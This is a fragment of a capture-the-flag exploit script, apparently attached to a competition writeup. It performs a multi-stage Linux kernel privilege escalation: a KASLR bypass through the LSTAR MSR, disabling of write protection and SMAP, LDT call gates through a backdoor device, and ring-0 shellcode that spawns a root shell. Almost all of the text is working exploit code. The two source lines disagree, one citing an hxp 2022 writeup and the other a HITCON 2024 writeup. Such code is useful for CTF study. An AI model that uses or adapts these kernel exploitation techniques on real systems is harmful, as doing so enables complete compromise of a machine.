# https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/

TRAMPOLIN = 0xc00000

MSR_LSTAR=0xc0000082
KASLR_WRITABLE=0xa00000
KASLR_LSTAR=0xa00010
KASRL_WRITABLE_END=0xc00000
KASLR_INIT_TASK=0x1613940
KASLR_WRITE_TO=0xbad000
PERCPU_CURRENT=0x1fbc0

RING0_LEN = len(ring0)

# write ring0 payload to kernel space and execute
trampolin = asm(f"""
cli

// Read LSTAR to bypass KASLR
mov ecx, {MSR_LSTAR}
rdmsr
shl rdx, 32
or rdx, rax
subq rdx, {KASLR_LSTAR}
movq rbp, rdx

// Disable WP
movq r8, cr0
andq r8, {(~(1 << 16))}
movq cr0, r8

// Copy stage 5.2 to the mapped kernel entry point
movq rdi, rbp
addq rdi, {KASLR_WRITE_TO}
movq r15, rdi
lea rsi, [rip+RING_0]
mov ecx, {RING0_LEN}
rep movsb

// Jump there.
jmp r15

RING_0:
""") + ring0

TRAMPOLIN_LEN = len(trampolin)

#############################################
# STAGE 4: KERNEL BACKDOOR, LDT CALL GATE #
#############################################

far_func = p64(0x67dead8664)

payload = bytearray(far_func+asm(f"""
{shc.echo("STAGE 4")}

{shc.echo("[+] INIT\n")}

{shc.pushstr("/dev/i_am_definitely_not_backdoor")}
{shc.syscall(cst.SYS_open, 'rsp', cst.O_RDWR, 0)}
cmp rax, 0
jl FAIL

mov rbx, rax
{shc.echo("[+] backdoor fd: ")}
{shc.itoa('rbx')}
{shc.strlen('rsp')}
{shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}

{shc.echo("\n[+] START\n")}

// disable SMAP
{shc.echo("[+] 'stac' in CPL3\n")}
pushfq
or QWORD PTR [rsp],0x40000
popfq

{shc.echo("[+] modify_ldt user\n")}
mov rax, 0x100001000
push rax
mov rax, 0x100000000c
push rax
mov rsi, rsp

{shc.syscall(cst.SYS_modify_ldt, 0x11, 'rsi', 0x10)}

{shc.echo("[+] modify_ldt high\n")}

mov rax, 0x380000FFFF
push rax
mov rax, 0xFFFF0000000E
push rax
mov rsi, rsp

{shc.syscall(cst.SYS_modify_ldt, 0x11, 'rsi', 0x10)}

{shc.echo("[+] write to backdoor\n")}
{shc.pushstr('TEST')}
mov rsi, rsp
{shc.syscall(cst.SYS_write, 'rbx', 'rsi', 0)}
cmp rax, 0
jl FAIL

{shc.echo("[+] cpy trampolin\n")}
{shc.mmap_rwx(size=0x10000, address=TRAMPOLIN)}
lea rsi, [rip+TRAMPOLIN]
{shc.memcpy(TRAMPOLIN, 'rsi', TRAMPOLIN_LEN)}

// call CALL GATE for privilige escalation
{shc.echo("[+] go to CPL 0\n")}
call FWORD PTR ds:{PIVOT-0xa6b00}

// should be root
{shc.echo("[+] spawning shell\n")}
{shc.sh()}
jmp FAIL

FAIL:
mov rbx, rax
neg rbx
{shc.echo("[-] errno: ")}
{shc.itoa('rbx')}
{shc.strlen('rsp')}
{shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}
{shc.echo("\n[-] FAIL\n")}
int 3

TRAMPOLIN:
""") + trampolin).ljust(0x500, asm('nop'))

#############################################
# STAGE 3: LOAD ENCODED PAYLOAD #
#############################################

PAYLOAD = 0x401000
PAYLOAD_LEN = len(payload)

loader = bytearray(asm(f"""
{shc.write(cst.STDOUT_FILENO, PIVOT+0x18, 7)}
xor rbx, rbx
LOAD:
// get two characters (one byte)
push 0
{shc.syscall(cst.SYS_read, cst.STDIN_FILENO, 'rsp', 2)}
cmp rax, 2
jl FAIL
pop rax
sub ah, 0x41
sub al, 0x41
shl al, 2
shl al, 2
shr rax, 2
shr rax, 2
mov BYTE PTR [rbx+{PAYLOAD}], al
inc rbx
cmp rbx, {PAYLOAD_LEN}
jb LOAD

// jmp to next stage
mov rax, {PAYLOAD+0x8}
jmp rax

FAIL:
{shc.write(cst.STDOUT_FILENO, PIVOT+0x20, 5)}
int 3
"""))

assert all(bad not in loader for bad in b"\x04\n"), "can't have certain escape chars"

# send all the code

linfo("STAGE 3: LOADER")

# linfo(disasm(loader))
sla("STAGE 2", bytes(loader))

# custom encoding:
# hex digits starting at 'A'
# and least significant nibble first

payload_enc = b''
for b in payload:
    lo = (b & 0xf) + 0x41
    hi = ((b & 0xf0) >> 4) + 0x41
    payload_enc += bytes((lo, hi))

linfo("STAGE 4: PAYLOAD")

sla('STAGE 3', payload_enc)

# linfo(disasm(payload))
linfo("payload len: 0x%x", len(payload))

ru("STAGE 4")

context.newline = b'\r\n'

while (out := rl().rstrip()) != b'[+] spawning shell':
    linfo(out.decode())

linfo(out.decode())

#############################################
# FINAL STAGE: GET FLAG #
#############################################

linfo("FINAL STAGE")

sl('echo PWND')
sla('PWND', '/root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag')

it() # or t.interactive()

```

</details>

Original writeup (https://w0y.at/writeup/2024/07/16/hitcon-ctf-2024-quals-seccomp-hell.html).